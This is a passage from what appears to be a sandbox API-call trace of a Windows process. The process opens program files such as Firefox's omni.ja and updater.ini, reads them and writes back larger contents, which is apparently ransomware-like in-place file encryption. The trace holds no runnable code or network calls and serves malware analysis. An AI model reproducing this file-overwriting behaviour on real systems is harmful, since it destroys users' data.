lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.030] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql2000.xsl", cchWideChar=11, lpMultiByteStr=0x1f7360c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql2000.xsl", lpUsedDefaultChar=0x0) returned 11 [0136.031] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0136.054] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x751c [0136.054] ReadFile (in: hFile=0x1f0, lpBuffer=0x2668268, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.091] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x751c [0136.092] WriteFile (in: hFile=0x1f0, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.092] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.092] WriteFile (in: hFile=0x1f0, lpBuffer=0x289f178*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x289f178*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0136.092] CloseHandle (hObject=0x1f0) returned 1 [0136.093] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\isspos.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\isspos.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.093] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\isspos.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft.NET\\isspos.exe", lpFilePart=0x2b1f690*="isspos.exe") returned 0x2f [0136.093] GetLastError () returned 0x20 [0136.093] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0136.094] LocalFree (hMem=0x696c00) returned 0x0 [0136.094] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0136.094] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0136.095] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.095] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.095] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Microsoft.NET\\isspos.exe" (normalized: "c:\\program files (x86)\\microsoft.net\\isspos.exe")) returned 0x20 [0136.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\browser\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x44080e [0136.097] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.097] ReleaseMutex (hMutex=0x168) returned 1 [0136.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omni.ja", lpUsedDefaultChar=0x0) returned 7 [0136.097] ReadFile (in: hFile=0x1f0, lpBuffer=0x28ab1d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28ab1d8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0136.167] ReadFile (in: hFile=0x1f0, lpBuffer=0x28ab1d8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28ab1d8*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0136.201] ReadFile (in: hFile=0x1f0, lpBuffer=0x28ab1d8, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x28ab1d8*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0136.231] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x43e80e [0136.231] ReadFile (in: hFile=0x1f0, lpBuffer=0x2872188, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2872188*, lpNumberOfBytesRead=0x2b1f278*=0x2000, lpOverlapped=0x0) returned 1 [0136.266] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-8192, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x43e80e [0136.267] WriteFile (in: hFile=0x1f0, lpBuffer=0x2872188*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2872188*, lpNumberOfBytesWritten=0x2b1f28c*=0x2588, lpOverlapped=0x0) returned 1 [0136.267] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.268] WriteFile (in: hFile=0x1f0, lpBuffer=0x2907068*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2907068*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0136.269] WriteFile (in: hFile=0x1f0, lpBuffer=0x2907068*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2907068*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0136.269] WriteFile (in: hFile=0x1f0, lpBuffer=0x2907068*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2907068*, lpNumberOfBytesWritten=0x2b1f28c*=0x2000, lpOverlapped=0x0) returned 1 [0136.269] CloseHandle (hObject=0x1f0) returned 1 [0136.270] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\freebl3.chk" (normalized: "c:\\program files (x86)\\mozilla firefox\\freebl3.chk"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.280] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.280] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x383 [0136.280] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.281] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.281] ReleaseMutex (hMutex=0x168) returned 1 [0136.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="freebl3.chk", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="freebl3.chk", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="freebl3.chk", lpUsedDefaultChar=0x0) returned 11 [0136.281] ReadFile (in: hFile=0x1f0, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x2b1f2bc*=0x383, lpOverlapped=0x0) returned 1 [0136.294] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.294] WriteFile (in: hFile=0x1f0, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x90b, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x90b, lpOverlapped=0x0) returned 1 [0136.294] CloseHandle (hObject=0x1f0) returned 1 [0136.295] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\plugin-hang-ui.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\plugin-hang-ui.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.296] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.296] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x6e70 [0136.296] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.296] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.297] ReleaseMutex (hMutex=0x168) returned 1 [0136.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin-hang-ui.exe", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0136.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="plugin-hang-ui.exe", cchWideChar=18, lpMultiByteStr=0x1f88b2c, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="plugin-hang-ui.exe", lpUsedDefaultChar=0x0) returned 18 [0136.297] ReadFile (in: hFile=0x1f0, lpBuffer=0x1e943a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.326] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e70 [0136.326] ReadFile (in: hFile=0x1f0, lpBuffer=0x2693be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0136.344] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x5e70 [0136.345] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0136.345] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0136.346] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0136.346] CloseHandle (hObject=0x1f0) returned 1 [0136.346] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4dd [0136.347] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.347] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.347] ReleaseMutex (hMutex=0x168) returned 1 [0136.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.347] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ini", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.ini", lpUsedDefaultChar=0x0) returned 11 [0136.348] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4dd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2b1f2bc*=0x4dd, lpOverlapped=0x0) returned 1 [0136.383] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.383] WriteFile (in: hFile=0x1f0, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0xa65, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa65, lpOverlapped=0x0) returned 1 [0136.383] CloseHandle (hObject=0x1f0) returned 1 [0136.384] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Maintenance Service\\updater.ini" (normalized: "c:\\program files (x86)\\mozilla maintenance service\\updater.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.389] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.389] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4dd [0136.390] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.390] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.390] ReleaseMutex (hMutex=0x168) returned 1 [0136.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ini", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0136.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.ini", cchWideChar=11, lpMultiByteStr=0x1f7346c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.ini", lpUsedDefaultChar=0x0) returned 11 [0136.390] ReadFile (in: hFile=0x1f0, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x4dd, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x2b1f2bc*=0x4dd, lpOverlapped=0x0) returned 1 [0136.391] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.391] WriteFile (in: hFile=0x1f0, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0xa65, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x2b1f2d0*=0xa65, lpOverlapped=0x0) returned 1 [0136.391] CloseHandle (hObject=0x1f0) returned 1 [0136.392] CreateFileW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\tar_files.exe" (normalized: "c:\\program files (x86)\\uninstall information\\tar_files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.392] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Uninstall Information\\tar_files.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Uninstall Information\\tar_files.exe", lpFilePart=0x2b1f690*="tar_files.exe") returned 0x3a [0136.393] GetLastError () returned 0x20 [0136.393] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0136.393] LocalFree (hMem=0x696c00) returned 0x0 [0136.393] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0136.393] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0136.393] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.393] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.393] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Uninstall Information\\tar_files.exe" (normalized: "c:\\program files (x86)\\uninstall information\\tar_files.exe")) returned 0x20 [0136.394] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.394] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui", lpFilePart=0x2b1f690*="PhotoViewer.dll.mui") returned 0x45 [0136.394] GetLastError () returned 0x5 [0136.394] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x13 [0136.394] LocalFree (hMem=0x69e2b0) returned 0x0 [0136.394] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0136.395] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0136.395] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.395] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.395] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui" (normalized: "c:\\program files (x86)\\windows photo viewer\\en-us\\photoviewer.dll.mui")) returned 0x20 [0136.396] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\twelve.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\twelve.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0136.396] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\twelve.exe", nBufferLength=0x104, lpBuffer=0x2b1f694, lpFilePart=0x2b1f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Portable Devices\\twelve.exe", lpFilePart=0x2b1f690*="twelve.exe") returned 0x3a [0136.396] GetLastError () returned 0x20 [0136.396] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x20, dwLanguageId=0x0, lpBuffer=0x2b1f8a4, nSize=0x0, Arguments=0x0 | out: lpBuffer="氀iʱ폈Hʱ퐔HʱLʱꨈǷ\x01") returned 0x51 [0136.396] LocalFree (hMem=0x696c00) returned 0x0 [0136.397] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x2b1d860, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0136.397] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x2b1f894) [0136.397] RtlUnwind (TargetFrame=0x2b1f8fc, TargetIp=0x406ffc, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.397] RtlUnwind (TargetFrame=0x2b1f920, TargetIp=0x407184, ExceptionRecord=0x2b1f378, ReturnValue=0x0) [0136.397] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Portable Devices\\twelve.exe" (normalized: "c:\\program files (x86)\\windows portable devices\\twelve.exe")) returned 0x20 [0136.398] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f0 [0136.399] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.399] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x146 [0136.399] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0136.399] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.399] ReleaseMutex (hMutex=0x168) returned 1 [0136.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0136.399] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1f88b2c, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GRAPH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0136.400] ReadFile (in: hFile=0x1f0, lpBuffer=0x268af88, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x268af88*, lpNumberOfBytesRead=0x2b1f2bc*=0x146, lpOverlapped=0x0) returned 1 [0136.401] SetFilePointer (in: hFile=0x1f0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0136.401] WriteFile (in: hFile=0x1f0, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x6ce, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, 